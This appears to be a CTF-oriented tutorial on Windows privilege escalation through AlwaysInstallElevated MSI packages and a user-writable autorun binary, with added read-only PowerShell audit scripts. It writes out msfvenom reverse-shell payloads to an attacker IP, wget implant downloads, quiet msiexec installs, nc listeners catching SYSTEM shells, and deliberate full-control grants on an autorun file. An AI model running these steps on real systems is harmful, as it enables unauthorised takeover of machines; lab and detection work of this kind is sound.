Windows Local Privilege Escalation - Registry Hives for CTF Creators

Registry Hives

Registry hives are essential components of the Windows operating system’s registry. They are logical groups of keys, subkeys, and values that store configuration settings and options for the operating system and installed applications. Each hive is associated with a set of supporting files that are loaded into memory when the system starts or a user logs in.

Here are the main registry hives:

  1. HKEY_CLASSES_ROOT (HKCR): Contains information about registered applications, including file associations and OLE object class IDs.
  2. HKEY_CURRENT_USER (HKCU): Stores settings and preferences for the currently logged-in user.
  3. HKEY_LOCAL_MACHINE (HKLM): Contains configuration settings for the local computer, including hardware and software settings.
  4. HKEY_USERS (HKU): Holds user-specific settings for all users on the system.
  5. HKEY_CURRENT_CONFIG (HKCC): Contains information about the current hardware profile used by the system.

Each hive has its own set of supporting files, typically located in the %SystemRoot%\System32\Config directory. These files are updated whenever changes are made to the registry.

Privilege Escalation via AlwaysInstallElevated

The MSI Wrapper is for software developers who have a setup executable file and want to offer an MSI that wraps their original setup executable file. It is also useful for system administrators with a setup.exe they want to distribute as an MSI to client computers in their organization.

Once you have downloaded the MSI Wrapper:

/images/posts/msi-wrapper-downloaded.png
MSI Wrapper

Execute the setup wizard and click Next:

/images/posts/msi-wrapper-1.png
MSI Wrapper

Accept the License Agreement and click Next:

/images/posts/msi-wrapper-2.png
MSI Wrapper

We can change the destination folder if we want; I will leave it as it is:

/images/posts/msi-wrapper-3.png
MSI Wrapper

Then click Install:

/images/posts/msi-wrapper-4.png
MSI Wrapper

Once it is completed, click on Finish:

/images/posts/msi-wrapper-5.png
MSI Wrapper

Optionally, we could create a desktop shortcut or pin to the taskbar:

/images/posts/msi-wrapper-6.png
MSI Wrapper

Generate an executable reverse shell:

❯ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.119.130 LPORT=443 -f exe -o implant.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: implant.exe

Set up an HTTP listener:

❯ sudo python3 -m http.server 80
[sudo] password for kali:
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.119.129 - - [06/Mar/2022 17:54:06] "GET /implant.exe HTTP/1.1" 200 -

Download the file with PowerShell:

PS C:\Tools> wget 192.168.119.130/implant.exe -O implant.exe

This will be the MSI wrapper configuration file msi_template.xml:

<MsiWrapper>
  <Installer>
    <IconFile Detect="executable" Value="" />
    <Output FileName="C:\Tools\implant.msi" />
    <InstallPrivileges Value="Elevated" />
    <PerUser Value="yes" />
    <ElevateExecutable Value="always" />
    <UpgradeCode Value="{55F46570-1C98-4098-9191-18B383E567D3}" />
    <ProductId Value="" />
    <Registration Value="None" />
    <Manufacturer Detect="" Value="Holo Industries" />
    <ProductVersion Detect="executable" Value="0.0.0.0" />
    <ProductName Detect="" Value="Holo" />
    <Comments Detect="executable" Value="" />
    <Contact Detect="" Value="" />
    <HelpLink Detect="" Value="" />
    <UpdateLink Detect="" Value="" />
    <AboutLink Detect="" Value="" />
  </Installer>
  <WrappedInstaller>
    <Executable FileName="C:\Tools\implant.exe" SuccessCodes="" Impersonate="no" IncludeFiles="no" CompressionLevel="Max" />
    <ApplicationId Value="" />
    <Install>
      <Arguments Value="">
        <UILevelNone Value="" />
        <UILevelBasic Value="" />
        <UILevelReduced Value="" />
        <UILevelFull Value="" />
      </Arguments>
      <RunBeforeInstall Value="" />
      <RunAfterInstall Value="" />
    </Install>
    <Uninstall>
      <Arguments Value="">
        <UILevelNone Value="" />
        <UILevelBasic Value="" />
        <UILevelReduced Value="" />
        <UILevelFull Value="" />
      </Arguments>
    </Uninstall>
  </WrappedInstaller>
</MsiWrapper>

Then we’re gonna execute MSI Wrapper and click on Load Settings:

/images/posts/msi-wrapper-7.png
MSI Wrapper

Open the configuration file:

/images/posts/msi-wrapper-8.png
MSI Wrapper

Once the configuration is loaded, click Ok and then click on Next >:

/images/posts/msi-wrapper-9.png
MSI Wrapper

Verify the executable and the implant MSI package:

/images/posts/msi-wrapper-10.png
MSI Wrapper

This setting is up to you:

/images/posts/msi-wrapper-11.png
MSI Wrapper

Make sure the Security and User Context are correct:

/images/posts/msi-wrapper-12.png
MSI Wrapper

Click next until the build:

/images/posts/msi-wrapper-13.png
MSI Wrapper

After building the MSI package we will receive a message like this:

/images/posts/msi-wrapper-14.png
MSI Wrapper

Now click Exit and navigate to the MSI package:

PS C:\Users\user> whoami /all

USER INFORMATION
----------------

User Name            SID
==================== =============================================
desktop-bn\user S-1-5-21-264094270-2388996790-3434637240-1001


GROUP INFORMATION
-----------------

Group Name                                                    Type             SID          Attributes
============================================================= ================ ============ ==================================================
Everyone                                                      Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114    Group used for deny only
BUILTIN\Administrators                                        Alias            S-1-5-32-544 Group used for deny only
BUILTIN\Performance Log Users                                 Alias            S-1-5-32-559 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                                                 Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE                                      Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                                                 Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users                              Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                                Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account                                    Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                                         Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication                              Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level                        Label            S-1-16-8192


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

Install the MSI package quietly:

msiexec /quiet /qn /i c:\Tools\implant.msi

After executing the malicious MSI, we receive a reverse shell as NT AUTHORITY\SYSTEM:

❯ nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.119.130] from (UNKNOWN) [192.168.119.129] 58480
Microsoft Windows [Version 10.0.22000.318]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\SysWOW64>whoami /all
whoami /all

USER INFORMATION
----------------

User Name           SID
=================== ========
nt authority\system S-1-5-18


GROUP INFORMATION
-----------------

Group Name                           Type             SID                                                            Attributes       
==================================== ================ ============================================================== ==================================================
Mandatory Label\High Mandatory Level Label            S-1-16-12288                                                                    
Everyone                             Well-known group S-1-1-0                                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                        Alias            S-1-5-32-545                                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                 Well-known group S-1-5-6                                                        Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                        Well-known group S-1-2-1                                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11                                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15                                                       Mandatory group, Enabled by default, Enabled group
NT SERVICE\msiserver                 Well-known group S-1-5-80-685333868-2237257676-1431965530-1907094206-2438021966 Enabled by default, Enabled group, Group owner
LOCAL                                Well-known group S-1-2-0                                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators               Alias            S-1-5-32-544                                                   Enabled by default, Enabled group, Group owner


PRIVILEGES INFORMATION
----------------------

Privilege Name                  Description                               State
=============================== ========================================= ========
SeAssignPrimaryTokenPrivilege   Replace a process level token             Disabled
SeLockMemoryPrivilege           Lock pages in memory                      Enabled
SeIncreaseQuotaPrivilege        Adjust memory quotas for a process        Disabled
SeTcbPrivilege                  Act as part of the operating system       Enabled
SeSecurityPrivilege             Manage auditing and security log          Enabled
SeTakeOwnershipPrivilege        Take ownership of files or other objects  Disabled
SeLoadDriverPrivilege           Load and unload device drivers            Disabled
SeProfileSingleProcessPrivilege Profile single process                    Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority              Enabled
SeCreatePagefilePrivilege       Create a pagefile                         Enabled
SeCreatePermanentPrivilege      Create permanent shared objects           Enabled
SeBackupPrivilege               Back up files and directories             Disabled
SeRestorePrivilege              Restore files and directories             Disabled
SeShutdownPrivilege             Shut down the system                      Disabled
SeAuditPrivilege                Generate security audits                  Enabled
SeChangeNotifyPrivilege         Bypass traverse checking                  Enabled
SeImpersonatePrivilege          Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege         Create global objects                     Enabled
SeCreateSymbolicLinkPrivilege   Create symbolic links                     Enabled

ERROR: Unable to get user claims information.

If we execute Process Hacker as Administrator we can see the process tree:

/images/posts/process-hacker-autoelevate.png
Process Hacker AutoElevate

Note: In the case that you don’t see the process tree, double click on the Name column to change the view. You may need to double click (change the view) multiple times.

Alternatively, we can just generate an MSI reverse shell:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.119.130 LPORT=443 -f msi -o implant.msi

Note: This can be easily detected by modern AVs.

Set up an HTTP listener with Python:

sudo python3 -m http.server

Download the malicious MSI file to the current working directory:

wget 192.168.146.128:8000/reverse.msi -o reverse.msi

Attempt to install reverse.msi by executing the following command:

.\reverse.msi

In the UAC prompt, click Yes and wait for the connection:

/images/posts/registry-uac.png
UAC Registry

Receive the connection:

sudo nc -lvnp 443
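
Windows Installer runs a package with SYSTEM privileges only when the AlwaysInstallElevated value is 1 in both the machine hive and the installing user's hive, so the state of those two values decides whether the walkthrough above works on a given box. The following read-only audit is an added example, not part of the original post; the function name Get-AlwaysInstallElevatedState is hypothetical, and it goes slightly beyond the post by walking every loaded profile under HKEY_USERS instead of only HKCU.

```powershell
# Added example (read-only): report where AlwaysInstallElevated is switched on.
# Windows Installer only elevates when the machine value AND the user's value are 1.

function Get-AlwaysInstallElevatedState {
    [CmdletBinding()]
    param()

    $subKey = 'SOFTWARE\Policies\Microsoft\Windows\Installer'

    # Returns the DWORD, or $null when the key or value is absent or unreadable.
    $readPolicy = {
        param([string]$KeyPath)
        if (-not (Test-Path -LiteralPath $KeyPath -ErrorAction SilentlyContinue)) { return $null }
        $item = Get-ItemProperty -LiteralPath $KeyPath -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        if ($item) { $item.AlwaysInstallElevated }
    }

    $machine = & $readPolicy "Registry::HKEY_LOCAL_MACHINE\$subKey"

    # HKEY_USERS has one subkey per loaded profile (HKCU is the caller's own).
    # Local and domain accounts are S-1-5-21-*, Entra ID accounts are S-1-12-1-*.
    # Reading other users' hives needs an elevated prompt; unreadable ones show $null.
    Get-ChildItem -LiteralPath 'Registry::HKEY_USERS' -ErrorAction SilentlyContinue |
        Where-Object { $_.PSChildName -match '^S-1-(5-21|12-1)-[\d-]+$' } |
        ForEach-Object {
            $user = & $readPolicy "Registry::HKEY_USERS\$($_.PSChildName)\$subKey"
            [pscustomobject]@{
                Sid              = $_.PSChildName
                MachineValue     = $machine
                UserValue        = $user
                ElevatesInstalls = ($machine -eq 1 -and $user -eq 1)
            }
        }
}

$state = @(Get-AlwaysInstallElevatedState)
$state | Format-Table -AutoSize

if (@($state | Where-Object ElevatesInstalls).Count -gt 0) {
    Write-Warning 'AlwaysInstallElevated is active for at least one user: any MSI that user starts installs as SYSTEM.'
} else {
    Write-Output 'AlwaysInstallElevated is not active for any loaded user profile.'
}
```

Outside a deliberately vulnerable lab, the Group Policy setting "Always install with elevated privileges" should be Disabled or Not Configured in both Computer Configuration and User Configuration, which leaves both values absent or 0.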

Privilege Escalation via Autorun Registry

Run PowerShell or the command prompt as administrator and then create the directory:

PS C:\Windows\system32> md "C:\Program Files\Autorun Program"


    Directory: C:\Program Files


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          3/6/2022   8:03 PM                Autorun Program

Add a dummy program:

PS C:\Windows\system32> copy C:\Windows\System32\locator.exe "C:\Program Files\Autorun Program\program.exe"

Grant the Authenticated Users group full permissions on the file:

PS C:\Windows\system32> icacls "C:\Program Files\Autorun Program\program.exe" /grant "Authenticated Users:F"
processed file: C:\Program Files\Autorun Program\program.exe
Successfully processed 1 files; Failed processing 0 files

Add the program to run at startup via registry:

PS C:\Windows\system32> reg add HKLM\software\microsoft\windows\currentversion\run /v "My Program" /t REG_SZ /d "C:\Program Files\Autorun Program\program.exe" /f
The operation completed successfully.

PS C:\Windows\system32> dir "C:\Program Files\Autorun Program\program.exe"


    Directory: C:\Program Files\Autorun Program


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          6/5/2021   8:05 AM          28672 program.exe

We can review the permissions:

PS C:\> icacls "C:\Program Files\Autorun Program\program.exe"
C:\Program Files\Autorun Program\program.exe NT AUTHORITY\Authenticated Users:(F)
                                             Everyone:(F)
                                             NT AUTHORITY\SYSTEM:(I)(F)
                                             BUILTIN\Administrators:(I)(F)
                                             BUILTIN\Users:(I)(RX)
                                             APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                                             APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)

Successfully processed 1 files; Failed processing 0 files

Alternatively, we can use accesschk from SysInternals:

PS C:\> C:\Tools\SysinternalsSuite\accesschk64.exe -accepteula -wvu "C:\Program Files\Autorun Program"

Accesschk v6.14 - Reports effective permissions for securable objects
Copyright  2006-2021 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\Program Files\Autorun Program\program.exe
  Medium Mandatory Level (Default) [No-Write-Up]
  RW NT AUTHORITY\Authenticated Users
        FILE_ALL_ACCESS
  RW Everyone
        FILE_ALL_ACCESS
  RW NT AUTHORITY\SYSTEM
        FILE_ALL_ACCESS
  RW BUILTIN\Administrators
        FILE_ALL_ACCESS
  RW BUILTIN\Users
        FILE_ALL_ACCESS

From the output above we can see that the “NT AUTHORITY\Authenticated Users” user group has “FILE_ALL_ACCESS” permission on the “program.exe” file.

Open command prompt or PowerShell as administrator and run the Autoruns GUI app:

C:\Tools\SysinternalsSuite\Autoruns64.exe

Note: If the Autoruns64.exe GUI doesn’t show the “My Program” autorun registry key, try executing as administrator first.

In Autoruns, click on the ‘Logon’ tab and from the listed results, notice that the “My Program” entry is pointing to “C:\Program Files\Autorun Program\program.exe”:

/images/posts/autoruns-program.exe.png
AutoRuns Program

The command-line version of Autoruns is autorunsc.exe, which can be run at medium integrity by a low-privileged user:

PS C:\Program Files\Autorun Program> C:\Tools\SysinternalsSuite\autorunsc64.exe -accepteula -a l

Sysinternals Autoruns v14.09 - Autostart program viewer
Copyright (C) 2002-2022 Mark Russinovich
Sysinternals - www.sysinternals.com


<...SNIP...>

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
   SecurityHealth
     %windir%\system32\SecurityHealthSystray.exe
     Windows Security notification icon
     Microsoft Corporation
     10.0.22000.65
     c:\windows\system32\securityhealthsystray.exe
     12/2/1926 7:27 PM
   VMware User Process
     "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
     VMware Tools Core Service
     VMware, Inc.
     11.3.5.31214
     c:\program files\vmware\vmware tools\vmtoolsd.exe
     8/31/2021 5:27 AM
   My Program
     "C:\Program Files\Autorun Program\program.exe"
     c:\program files\autorun program\program.exe


<...SNIP...>
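
The icacls, accesschk and autorunsc checks above answer one question between them: does a machine-wide autorun entry point at a file that ordinary users can overwrite? The following read-only audit combines them and is an added example, not part of the original post; the function names Resolve-AutorunTarget and Get-WritableAutorun are hypothetical, and it checks the target file's ACL only, not its parent directory.

```powershell
# Added example (read-only): find machine-wide autorun entries whose target file
# can be modified by broad, non-administrative groups.

$runKeys = @(
    'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
    'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
    'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run'
)

# Well-known SIDs (language independent): Everyone, Authenticated Users,
# INTERACTIVE, BUILTIN\Users.
$broadSids = 'S-1-1-0', 'S-1-5-11', 'S-1-5-4', 'S-1-5-32-545'

# Rights that let a principal alter or replace the file, plus the raw
# GENERIC_WRITE (0x40000000) and GENERIC_ALL (0x10000000) bits.
$rights    = [System.Security.AccessControl.FileSystemRights]'Write, Delete, ChangePermissions, TakeOwnership'
$writeBits = ([int]$rights) -bor 0x50000000

function Resolve-AutorunTarget {
    param([string]$CommandLine)
    $cmd = [Environment]::ExpandEnvironmentVariables($CommandLine).Trim()
    if ($cmd -match '^"([^"]+)"')        { return $Matches[1] }   # "C:\path with spaces\app.exe" -args
    if ($cmd -match '^(.+?\.exe)(\s|$)') { return $Matches[1] }   # C:\path\app.exe -args
    return ($cmd -split '\s+')[0]
}

function Get-WritableAutorun {
    foreach ($keyPath in $runKeys) {
        $key = Get-Item -LiteralPath $keyPath -ErrorAction SilentlyContinue
        if (-not $key) { continue }

        foreach ($name in $key.GetValueNames()) {
            $target = Resolve-AutorunTarget ([string]$key.GetValue($name))
            if (-not $target -or -not (Test-Path -LiteralPath $target -PathType Leaf)) { continue }

            $acl = Get-Acl -LiteralPath $target -ErrorAction SilentlyContinue
            if (-not $acl) { continue }

            # Ask for the rules with SIDs instead of localized account names.
            $rules = $acl.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])
            foreach ($rule in $rules) {
                if ($rule.AccessControlType -ne 'Allow') { continue }
                if ($broadSids -notcontains $rule.IdentityReference.Value) { continue }
                if ((([int]$rule.FileSystemRights) -band $writeBits) -eq 0) { continue }

                [pscustomobject]@{
                    Key       = $key.Name
                    ValueName = $name
                    Target    = $target
                    Sid       = $rule.IdentityReference.Value
                    Rights    = $rule.FileSystemRights
                }
            }
        }
    }
}

Get-WritableAutorun | Format-Table -AutoSize -Wrap
```

Once the exercise is over, `icacls "<file>" /reset` replaces the explicit grants on a flagged file with the ACL inherited from its parent directory.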

Since we have write permissions to C:\Program Files\Autorun Program\program.exe we can replace it with a payload or an implant. In this case, I will generate an executable reverse shell:

❯ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.119.130 LPORT=443 -f exe -o implant.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: implant.exe

Then I will set up an HTTP listener on my attacker machine:

❯ sudo python3 -m http.server 80
[sudo] password for kali:
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Transfer and replace the original executable with PowerShell:

PS C:\> wget 192.168.119.130/implant.exe -O "C:\Program Files\Autorun Program\program.exe"

On the attacker machine, we will set up a listener:

❯ nc -lvnp 443

Now let’s sign out, sign in as Administrator and wait a bit; we should then receive a connection as the Administrator user:

❯ nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.119.130] from (UNKNOWN) [192.168.119.129] 58708
Microsoft Windows [Version 10.0.22000.318]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami /all
whoami /all

USER INFORMATION
----------------

User Name                     SID                                  
============================= ============================================
desktop-bn\administrator S-1-5-21-264094270-2388996790-3434637240-500


GROUP INFORMATION
-----------------

Group Name                                                    Type             SID          Attributes                                
============================================================= ================ ============ ===============================================================
Everyone                                                      Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114    Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                                        Alias            S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Performance Log Users                                 Alias            S-1-5-32-559 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                                                 Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE                                      Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                                                 Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users                              Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                                Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account                                    Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                                         Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication                              Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level                          Label            S-1-16-12288                                           


PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State
========================================= ================================================================== ========
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Disabled
SeSecurityPrivilege                       Manage auditing and security log                                   Disabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Disabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Disabled
SeSystemProfilePrivilege                  Profile system performance                                         Disabled
SeSystemtimePrivilege                     Change the system time                                             Disabled
SeProfileSingleProcessPrivilege           Profile single process                                             Disabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Disabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Disabled
SeBackupPrivilege                         Back up files and directories                                      Disabled
SeRestorePrivilege                        Restore files and directories                                      Disabled
SeShutdownPrivilege                       Shut down the system                                               Disabled
SeDebugPrivilege                          Debug programs                                                     Disabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Disabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Disabled
SeUndockPrivilege                         Remove computer from docking station                               Disabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Disabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Disabled
SeTimeZonePrivilege                       Change the time zone                                               Disabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Disabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Disabled

Note: A firewall or an antivirus/anti-malware might block the connection.

We can use Process Hacker to view the process token:

/images/posts/process-hacker-autoruns.png
Process Hacker AutoRuns

We can also view the connection with TCPView:

/images/posts/tcpview-program.exe.png
TCPView

We could also use the TCPView command line version:

PS C:\Tools\SysinternalsSuite> .\tcpvcon.exe

Tcpvcon.exe v4.17 - Sysinternals TcpVcon
Copyright (C) 1996-2022 Mark Russinovich & Bryce Cogswell
Sysinternals - www.sysinternals.com

[TCP] svchost.exe
        PID:    2980
        State:  ESTABLISHED
        Local:  desktop-bn.localdomain
        Remote: 40.83.240.146
[TCP] program.exe
        PID:    16460
        State:  ESTABLISHED
        Local:  desktop-bn.localdomain
        Remote: 192.168.119.130
[TCP] [System Process]
        PID:    0
        State:  TIME_WAIT
        Local:  desktop-bn.localdomain
        Remote: 52.143.80.209
[TCP] explorer.exe
        PID:    11356
        State:  ESTABLISHED
        Local:  desktop-bn.localdomain
        Remote: 52.184.206.73
[TCP] svchost.exe
        PID:    3568
        State:  ESTABLISHED
        Local:  desktop-bn.localdomain
        Remote: 52.143.84.45